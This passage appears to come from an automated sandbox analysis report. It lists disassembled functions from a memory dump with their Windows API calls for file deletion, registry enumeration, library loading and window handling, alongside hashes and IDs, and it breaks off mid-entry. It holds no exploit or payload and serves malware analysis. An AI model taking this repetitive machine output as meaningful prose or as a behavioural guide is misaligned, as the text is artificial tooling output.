                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                                    • Opcode ID: 540bde48a6daa7082b79f080add3603326ff7c7992291e01f4e83d179145a571
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2eb59fab53a59cfabdbe06d45edb3c1cd6694d130ee0bef1734c813ad980dbea
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 540bde48a6daa7082b79f080add3603326ff7c7992291e01f4e83d179145a571
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCE02BB080B611DFD7355B644C48EEB35186F28704F10A2DAFD0AF2250EB30CC48C694
                                                                                                                                                                                                                                                                                                    Function 00E26607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26610
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E26622
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00E65657,?,?,00E262FA,?,00000001,?,?,00000000), ref: 00E26635
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                                    • Opcode ID: 88f63662191a8600fe108e139da555ec676fbb021a784af885287c0c7f699b4f
                                                                                                                                                                                                                                                                                                    • Instruction ID: 27f01e90570391edbf8aa8414e180fc8233c0ce8aeb5a9dc66a9d92c28b8080d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88f63662191a8600fe108e139da555ec676fbb021a784af885287c0c7f699b4f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AD05B356177325B4232372A7C189CF7B149FD1F157051325F800B2164EF64CD16C5D8
                                                                                                                                                                                                                                                                                                    Function 00E93306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E935C4
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00E93646
                                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E9365C
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9366D
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E9367F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a188a73eed4fc65f093ab3c9f4a5ba638e6379889d64da9fbe12a86c7c1b823
                                                                                                                                                                                                                                                                                                    • Instruction ID: 83121555a14dfc55b6ddbe01199498f5795273143ba6e408824e8a3d9907000a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a188a73eed4fc65f093ab3c9f4a5ba638e6379889d64da9fbe12a86c7c1b823
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95B15E72E00219ABDF15DFA4DC85EDEBBBDEF48314F0051A6F609F6151EA309B448B61
                                                                                                                                                                                                                                                                                                    Function 00EAADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00EAAE87
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EAAE95
                                                                                                                                                                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EAAEC8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EAB09D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b80cb8a566a3f5722856259befe236cce6bf210869816119eca13ac7c33cf48b
                                                                                                                                                                                                                                                                                                    • Instruction ID: a6b8ab300af663f221a27ebbebf0f34fa891cdb7246e1739e92c25a0d306937a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80cb8a566a3f5722856259befe236cce6bf210869816119eca13ac7c33cf48b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28A1B071A04311AFE720DF24C886B2AB7E5AF48714F14985DF599AB3D2DB71EC40CB81
                                                                                                                                                                                                                                                                                                    Function 00EAC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC505
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EAC560
                                                                                                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EAC5C3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00EAC606
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAC613
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: bb416e12a281ddf2ce5f52533678cf511bc78f417d4597064baa6017ae2d1e90
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9f60a0973940c3dae290f5ad225ad60a604da7bc27ffd40464a8e4ef5140b981
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb416e12a281ddf2ce5f52533678cf511bc78f417d4597064baa6017ae2d1e90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C261A131608241AFD714DF14C890E6ABBE5FF89308F54955CF09AAB292DB31FD46CB91
                                                                                                                                                                                                                                                                                                    Function 00E8ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E8D7CD,?), ref: 00E8E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E8D7CD,?), ref: 00E8E72D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E8EAB0: GetFileAttributesW.KERNEL32(?,00E8D840), ref: 00E8EAB1
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00E8ED8A
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00E8EDC3
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8EF02
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E8EF1A
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E8EF67
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0a13ec089ae394d81c5caba503c6976c2cb8f53fd53aee05a5b54d949fe19e95
                                                                                                                                                                                                                                                                                                    • Instruction ID: c8f3fbeed1db6ea1dfdd2a059b17dbd0a2da44b6df55fcd312abd07e60654c0c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a13ec089ae394d81c5caba503c6976c2cb8f53fd53aee05a5b54d949fe19e95
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F25163B21083849BC725EB64DC819DBB3ECAF85354F00192EF68DE3191EF71A6888756
                                                                                                                                                                                                                                                                                                    Function 00E89517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00E89534
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00E895A5
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32 ref: 00E89604
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00E89677
                                                                                                                                                                                                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E896A2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 387e4b8d4046c9b0338e8134820cb407155c688b0f765e25e1b9b54237d7135e
                                                                                                                                                                                                                                                                                                    • Instruction ID: bcbdd613c57856494761c422dcfea8ae2af31095fbf908f4e130a7e7d26decca
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 387e4b8d4046c9b0338e8134820cb407155c688b0f765e25e1b9b54237d7135e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF514BB5A00219EFCB14DF58C884EAAB7F8FF88314B158559E91AEB310E730E911CF90
                                                                                                                                                                                                                                                                                                    Function 00E99540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00E995F3
                                                                                                                                                                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00E9961F
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00E99677
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00E9969C
                                                                                                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00E996A4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7fa5c2010d8a79e11d9041bc893d7c0bc7936cb336f10a7a47c625c8fe023672
                                                                                                                                                                                                                                                                                                    • Instruction ID: f8df22579cc79980c6969670bcfc89eb80c535aed84d9e7dd94592d8b0b39bdd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7fa5c2010d8a79e11d9041bc893d7c0bc7936cb336f10a7a47c625c8fe023672
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49513A35A00225AFCF05DF65D881AAEBBF5FF48314F058068E849AB362CB35ED41CB90
                                                                                                                                                                                                                                                                                                    Function 00EA9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EA999D
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EA9A2D
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EA9A49
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EA9A8F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EA9AAF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00E91A02,?,7529E610), ref: 00E3F9F1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E80354,00000000,00000000,?,?,00E91A02,?,7529E610,?,00E80354), ref: 00E3FA18
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: e96be781b247c77cdf17e8bcdb5c28903a891bc077a8392522223bafc6f8f54c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6e00bffb542d7b6a19b1b4804bfbc7736485319a192cde893344123b5863bd4d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e96be781b247c77cdf17e8bcdb5c28903a891bc077a8392522223bafc6f8f54c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C514A35605215DFCB01DF68C48499DBBF0FF49318B1591A9E806AF762D731ED86CB81
                                                                                                                                                                                                                                                                                                    Function 00EB75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EB766B
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00EB7682
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EB76AB
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00E9B5BE,00000000,00000000), ref: 00EB76D0
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EB76FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 456ccc3bd4ffab4320fc64383f5f3e100b6b45e2802aacb69ae435432557f1c5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4b9d4edcd784aa34c30316e5683f8eb4022e3f04426fccb1c7c7e719ad210e19
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 456ccc3bd4ffab4320fc64383f5f3e100b6b45e2802aacb69ae435432557f1c5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36410035A08514AFC7298F2CCC48FEB7BA5EB89354F111264F889B76E4D770ED00CA40
                                                                                                                                                                                                                                                                                                    Function 00E523C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free
